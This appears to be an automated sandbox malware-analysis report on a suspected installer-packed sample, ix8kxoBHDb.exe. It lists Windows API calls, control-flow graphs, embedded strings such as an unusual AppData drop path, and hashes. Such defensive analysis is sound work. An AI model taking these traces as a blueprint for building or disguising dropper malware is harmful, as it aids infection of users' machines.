                                                  • String ID: (7B$tH${
                                                  • API String ID: 590372296-2594422933
                                                  • Opcode ID: 25b2fdde4747a09c309382e68ae8746e18b360b2bf61ebef59f775d21e3b13bf
                                                  • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                  • Opcode Fuzzy Hash: 25b2fdde4747a09c309382e68ae8746e18b360b2bf61ebef59f775d21e3b13bf
                                                  • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                  APIs
                                                    • Part of subcall function 73B0121B: GlobalAlloc.KERNEL32(00000040,?,73B0123B,?,73B012DF,00000019,73B011BE,-000000A0), ref: 73B01225
                                                  • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 73B01C6B
                                                  • lstrcpyW.KERNEL32(00000008,?), ref: 73B01CB3
                                                  • lstrcpyW.KERNEL32(00000808,?), ref: 73B01CBD
                                                  • GlobalFree.KERNEL32(00000000), ref: 73B01CD0
                                                  • GlobalFree.KERNEL32(?), ref: 73B01DB2
                                                  • GlobalFree.KERNEL32(?), ref: 73B01DB7
                                                  • GlobalFree.KERNEL32(?), ref: 73B01DBC
                                                  • GlobalFree.KERNEL32(00000000), ref: 73B01FA6
                                                  • lstrcpyW.KERNEL32(?,?), ref: 73B02140
                                                  • GetModuleHandleW.KERNEL32(00000008), ref: 73B021B5
                                                  • LoadLibraryW.KERNEL32(00000008), ref: 73B021C6
                                                  • GetProcAddress.KERNEL32(?,?), ref: 73B02220
                                                  • lstrlenW.KERNEL32(00000808), ref: 73B0223A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1483517567.0000000073B01000.00000020.00000001.01000000.00000005.sdmp, Offset: 73B00000, based on PE: true
                                                  • Associated: 00000000.00000002.1483495722.0000000073B00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.1483809646.0000000073B04000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.1483843847.0000000073B06000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73b00000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                  • String ID:
                                                  • API String ID: 245916457-0
                                                  • Opcode ID: 5b5d10e4230cc0505f56368559c045ed01dba7c2b9f9bf8efc4be0b7b419014e
                                                  • Instruction ID: 0d01f2f1da90978ce2c879f1062bfe9305781c6658dfc67bc23cbd96d6580092
                                                  • Opcode Fuzzy Hash: 5b5d10e4230cc0505f56368559c045ed01dba7c2b9f9bf8efc4be0b7b419014e
                                                  • Instruction Fuzzy Hash: DC228A79D0420ADFEB2A9FA4CA847EEBFF5FB84305F14453AD166A7180F77096848B50

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 716 405afa-405b20 call 405dc5 719 405b22-405b34 DeleteFileW 716->719 720 405b39-405b40 716->720 721 405cb6-405cba 719->721 722 405b42-405b44 720->722 723 405b53-405b63 call 4063e8 720->723 724 405c64-405c69 722->724 725 405b4a-405b4d 722->725 731 405b72-405b73 call 405d09 723->731 732 405b65-405b70 lstrcatW 723->732 724->721 727 405c6b-405c6e 724->727 725->723 725->724 729 405c70-405c76 727->729 730 405c78-405c80 call 40672b 727->730 729->721 730->721 740 405c82-405c96 call 405cbd call 405ab2 730->740 735 405b78-405b7c 731->735 732->735 736 405b88-405b8e lstrcatW 735->736 737 405b7e-405b86 735->737 739 405b93-405baf lstrlenW FindFirstFileW 736->739 737->736 737->739 741 405bb5-405bbd 739->741 742 405c59-405c5d 739->742 756 405c98-405c9b 740->756 757 405cae-405cb1 call 405450 740->757 744 405bdd-405bf1 call 4063e8 741->744 745 405bbf-405bc7 741->745 742->724 747 405c5f 742->747 758 405bf3-405bfb 744->758 759 405c08-405c13 call 405ab2 744->759 748 405bc9-405bd1 745->748 749 405c3c-405c4c FindNextFileW 745->749 747->724 748->744 752 405bd3-405bdb 748->752 749->741 755 405c52-405c53 FindClose 749->755 752->744 752->749 755->742 756->729 762 405c9d-405cac call 405450 call 4061ae 756->762 757->721 758->749 763 405bfd-405c06 call 405afa 758->763 767 405c34-405c37 call 405450 759->767 768 405c15-405c18 759->768 762->721 763->749 767->749 771 405c1a-405c2a call 405450 call 4061ae 768->771 772 405c2c-405c32 768->772 771->749 772->749
                                                  APIs
                                                  • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,756F2EE0,00000000), ref: 00405B23
                                                  • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,756F2EE0,00000000), ref: 00405B6B
                                                  • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,756F2EE0,00000000), ref: 00405B8E
                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,756F2EE0,00000000), ref: 00405B94
                                                  • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,756F2EE0,00000000), ref: 00405BA4
                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                  • FindClose.KERNEL32(00000000), ref: 00405C53
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: "C:\Users\user\Desktop\ix8kxoBHDb.exe"$0WB$C:\Users\user\AppData\Local\Temp\$\*.*
                                                  • API String ID: 2035342205-63121444
                                                  • Opcode ID: efe765d34b709223bdb1d712638ee5584c001840e8cac4ec9717a6f7e167d989
                                                  • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                  • Opcode Fuzzy Hash: efe765d34b709223bdb1d712638ee5584c001840e8cac4ec9717a6f7e167d989
                                                  • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                  • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                  • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                  • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,?,?,756F2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,756F2EE0), ref: 00406736
                                                  • FindClose.KERNEL32(00000000), ref: 00406742
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID: xgB
                                                  • API String ID: 2295610775-399326502
                                                  • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                  • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                  • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                  • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
                                                  APIs
                                                  • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming\brugser\brugo\Obstetriker, xrefs: 004021C3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: CreateInstance
                                                  • String ID: C:\Users\user\AppData\Roaming\brugser\brugo\Obstetriker
                                                  • API String ID: 542301482-1454378569
                                                  • Opcode ID: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                  • Instruction ID: a370b0fa9b2e606d6813e98b4c017b265e4ea8c47d708310f479c561ceb58c7b
                                                  • Opcode Fuzzy Hash: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                  • Instruction Fuzzy Hash: 80414A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 190 403e86-403e98 191 403fd9-403fe8 190->191 192 403e9e-403ea4 190->192 194 404037-40404c 191->194 195 403fea-404032 GetDlgItem * 2 call 40435f SetClassLongW call 40140b 191->195 192->191 193 403eaa-403eb3 192->193 196 403eb5-403ec2 SetWindowPos 193->196 197 403ec8-403ecb 193->197 199 40408c-404091 call 4043ab 194->199 200 40404e-404051 194->200 195->194 196->197 202 403ee5-403eeb 197->202 203 403ecd-403edf ShowWindow 197->203 208 404096-4040b1 199->208 205 404053-40405e call 401389 200->205 206 404084-404086 200->206 209 403f07-403f0a 202->209 210 403eed-403f02 DestroyWindow 202->210 203->202 205->206 227 404060-40407f SendMessageW 205->227 206->199 207 40432c 206->207 215 40432e-404335 207->215 213 4040b3-4040b5 call 40140b 208->213 214 4040ba-4040c0 208->214 218 403f0c-403f18 SetWindowLongW 209->218 219 403f1d-403f23 209->219 216 404309-40430f 210->216 213->214 223 4040c6-4040d1 214->223 224 4042ea-404303 DestroyWindow EndDialog 214->224 216->207 222 404311-404317 216->222 218->215 225 403fc6-403fd4 call 4043c6 219->225 226 403f29-403f3a GetDlgItem 219->226 222->207 229 404319-404322 ShowWindow 222->229 223->224 230 4040d7-404124 call 40640a call 40435f * 3 GetDlgItem 223->230 224->216 225->215 231 403f59-403f5c 226->231 232 403f3c-403f53 SendMessageW IsWindowEnabled 226->232 227->215 229->207 260 404126-40412b 230->260 261 40412e-40416a ShowWindow KiUserCallbackDispatcher call 404381 EnableWindow 230->261 235 403f61-403f64 231->235 236 403f5e-403f5f 231->236 232->207 232->231 238 403f72-403f77 235->238 239 403f66-403f6c 235->239 237 403f8f-403f94 call 404338 236->237 237->225 241 403fad-403fc0 SendMessageW 238->241 243 403f79-403f7f 238->243 239->241 242 403f6e-403f70 239->242 241->225 242->237 246 403f81-403f87 call 40140b 243->246 247 403f96-403f9f call 40140b 243->247 256 403f8d 246->256 247->225 257 403fa1-403fab 247->257 256->237 257->256 260->261 264 40416c-40416d 261->264 265 40416f 261->265 266 404171-40419f GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 4041a1-4041b2 SendMessageW 266->267 268 4041b4 266->268 269 4041ba-4041f9 call 404394 call 403e67 call 4063e8 lstrlenW call 40640a SetWindowTextW call 401389 267->269 268->269 269->208 280 4041ff-404201 269->280 280->208 281 404207-40420b 280->281 282 40422a-40423e DestroyWindow 281->282 283 40420d-404213 281->283 282->216 285 404244-404271 CreateDialogParamW 282->285 283->207 284 404219-40421f 283->284 284->208 286 404225 284->286 285->216 287 404277-4042ce call 40435f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->207 287->207 292 4042d0-4042e3 ShowWindow call 4043ab 287->292 294 4042e8 292->294 294->216
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                  • ShowWindow.USER32(?), ref: 00403EDF
                                                  • DestroyWindow.USER32 ref: 00403EF3
                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                  • GetDlgItem.USER32(?,?), ref: 00403F30
                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                  • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                  • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                  • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                  • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                  • ShowWindow.USER32(00000000,?), ref: 00404135
                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404147
                                                  • EnableWindow.USER32(?,?), ref: 00404162
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                  • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                  • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                  • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                  • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                  • String ID: (7B$tH
                                                  • API String ID: 3282139019-2057435674
                                                  • Opcode ID: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                  • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                  • Opcode Fuzzy Hash: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                  • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 295 403ad8-403af0 call 4067c2 298 403af2-403b02 call 40632f 295->298 299 403b04-403b3b call 4062b6 295->299 308 403b5e-403b87 call 403dae call 405dc5 298->308 304 403b53-403b59 lstrcatW 299->304 305 403b3d-403b4e call 4062b6 299->305 304->308 305->304 313 403c19-403c21 call 405dc5 308->313 314 403b8d-403b92 308->314 320 403c23-403c2a call 40640a 313->320 321 403c2f-403c54 LoadImageW 313->321 314->313 315 403b98-403bc0 call 4062b6 314->315 315->313 322 403bc2-403bc6 315->322 320->321 324 403cd5-403cdd call 40140b 321->324 325 403c56-403c86 RegisterClassW 321->325 326 403bd8-403be4 lstrlenW 322->326 327 403bc8-403bd5 call 405cea 322->327 338 403ce7-403cf2 call 403dae 324->338 339 403cdf-403ce2 324->339 328 403da4 325->328 329 403c8c-403cd0 SystemParametersInfoW CreateWindowExW 325->329 333 403be6-403bf4 lstrcmpiW 326->333 334 403c0c-403c14 call 405cbd call 4063e8 326->334 327->326 332 403da6-403dad 328->332 329->324 333->334 337 403bf6-403c00 GetFileAttributesW 333->337 334->313 341 403c02-403c04 337->341 342 403c06-403c07 call 405d09 337->342 348 403cf8-403d12 ShowWindow call 406752 338->348 349 403d7b-403d7c call 405523 338->349 339->332 341->334 341->342 342->334 354 403d14-403d19 call 406752 348->354 355 403d1e-403d30 GetClassInfoW 348->355 353 403d81-403d83 349->353 356 403d85-403d8b 353->356 357 403d9d-403d9f call 40140b 353->357 354->355 361 403d32-403d42 GetClassInfoW RegisterClassW 355->361 362 403d48-403d6b DialogBoxParamW call 40140b 355->362 356->339 358 403d91-403d98 call 40140b 356->358 357->328 358->339 361->362 366 403d70-403d79 call 403a28 362->366 366->332
                                                  APIs
                                                    • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                    • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                  • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,756F3420,"C:\Users\user\Desktop\ix8kxoBHDb.exe",00000000), ref: 00403B59
                                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\brugser\brugo,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BD9
                                                  • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\brugser\brugo,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                  • GetFileAttributesW.KERNEL32(Call), ref: 00403BF7
                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\brugser\brugo), ref: 00403C40
                                                    • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                  • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                  • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                  • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                  • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "C:\Users\user\Desktop\ix8kxoBHDb.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\brugser\brugo$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                  • API String ID: 1975747703-735278675
                                                  • Opcode ID: e3f75488d19024041f1bb343cbf8cb78a09e2a23954cfc0fd164e097734ab2b2
                                                  • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                  • Opcode Fuzzy Hash: e3f75488d19024041f1bb343cbf8cb78a09e2a23954cfc0fd164e097734ab2b2
                                                  • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 369 402f30-402f7e GetTickCount GetModuleFileNameW call 405ede 372 402f80-402f85 369->372 373 402f8a-402fb8 call 4063e8 call 405d09 call 4063e8 GetFileSize 369->373 374 4031cf-4031d3 372->374 381 4030a8-4030b6 call 402e8e 373->381 382 402fbe-402fd5 373->382 389 403187-40318c 381->389 390 4030bc-4030bf 381->390 384 402fd7 382->384 385 402fd9-402fe6 call 403447 382->385 384->385 391 403143-40314b call 402e8e 385->391 392 402fec-402ff2 385->392 389->374 393 4030c1-4030d9 call 40345d call 403447 390->393 394 4030eb-403137 GlobalAlloc call 406923 call 405f0d CreateFileW 390->394 391->389 395 403072-403076 392->395 396 402ff4-40300c call 405e99 392->396 393->389 417 4030df-4030e5 393->417 420 403139-40313e 394->420 421 40314d-40317d call 40345d call 4031d6 394->421 400 403078-40307e call 402e8e 395->400 401 40307f-403085 395->401 396->401 415 40300e-403015 396->415 400->401 408 403087-403095 call 4068b5 401->408 409 403098-4030a2 401->409 408->409 409->381 409->382 415->401 419 403017-40301e 415->419 417->389 417->394 419->401 422 403020-403027 419->422 420->374 428 403182-403185 421->428 422->401 424 403029-403030 422->424 424->401 426 403032-403052 424->426 426->389 429 403058-40305c 426->429 428->389 430 40318e-40319f 428->430 431 403064-40306c 429->431 432 40305e-403062 429->432 433 4031a1 430->433 434 4031a7-4031ac 430->434 431->401 435 40306e-403070 431->435 432->381 432->431 433->434 436 4031ad-4031b3 434->436 435->401 436->436 437 4031b5-4031cd call 405e99 436->437 437->374
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402F44
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ix8kxoBHDb.exe,00000400), ref: 00402F60
                                                    • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\ix8kxoBHDb.exe,80000000,00000003), ref: 00405EE2
                                                    • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                  • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ix8kxoBHDb.exe,C:\Users\user\Desktop\ix8kxoBHDb.exe,80000000,00000003), ref: 00402FA9
                                                  • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030F0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
